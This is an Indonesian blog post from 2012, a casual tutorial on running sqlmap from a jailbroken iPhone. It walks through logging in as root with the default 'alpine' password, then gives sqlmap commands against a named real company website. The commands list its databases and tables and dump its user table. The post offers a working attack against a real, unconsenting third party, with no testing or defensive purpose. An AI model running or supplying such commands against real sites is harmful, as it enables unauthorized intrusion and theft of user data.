Thursday, 31 May 2012

Sqli Lewat Iphone

Assalamualaikum. Wr. Wb.
selamat malam warga Dunia Maya  smua... hai

sharing ilmu kali ini (berrawal dari ide kecil ane pas lagi maen2 sama havij di komputer trus ngeliat iPhone ane dan mikir kira-kira bisa g ya sqli dari iPhone...?)
nah akhirnya ane nanya ama kakek ane yg paling pinter se jagat maya, lalu menemukan lah lanjutan ide ane ini... okey g usah banyak bacot kita langsung ke resep masakannya... ngopi

proses pembuatan dan peralatan yg ane pnya... mohon
1. iPhone 3GS yang udah di (wajib) jailbrake
2. source reponya di tambahin dengan yg ini

PHP Code:
http://ininjas.com/repo/ 
3. download and install dua program ini dari cydianya langsung.. seneng
PHP Code:
-Terminal Emulator-Python (biasanya dah langsung ke install)
-
SQLmap 
4. nah skrg masuk deh ke "Terminal Emulator" tadi.
5. login dah sebagai user ROOT caranya:
PHP Code:
ketik su <enter>passwordalpine(password default root iPhone seluruh dunia...) 
sehati
6. masuk deh ke directory sqlmapnya:
PHP Code:
cd /pentest/database/sqlmapls 
7. kita dsini pake web vuln yg udah pernah di post ama om @SaccaFrazi tritnya
PHP Code:
http://devilzc0de.org/forum/thread-459-page-23.html 
PHP Code:
Analyzing http://www.pioneer-group.co.uk/event.php?id=17Host IP79.170.44.145
Web Server
Apache/2
Powered
-byPHP/5.2.17 
8. kita mulai berdoa
kita ketik perintahnya...
PHP Code:
./sqlmap.py -
9. kita coba inject kalem
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 --dbskita coba cari nama databasenya.. 
10. nah sekarang kita cari table user ato admin ato login ato apapun lah... ngakak
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer --tables 
11. sekarang kita cari column dari tabel yang tadi kita dapet... detektif
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --columns 
12. nah dah gitu kita dump deh ato mo di liat langsung juga boleh.. belajar
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --dump 
[Image: ape52t.png]

Socializer Widget By Blogger Yard
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

0 comments:

Post a Comment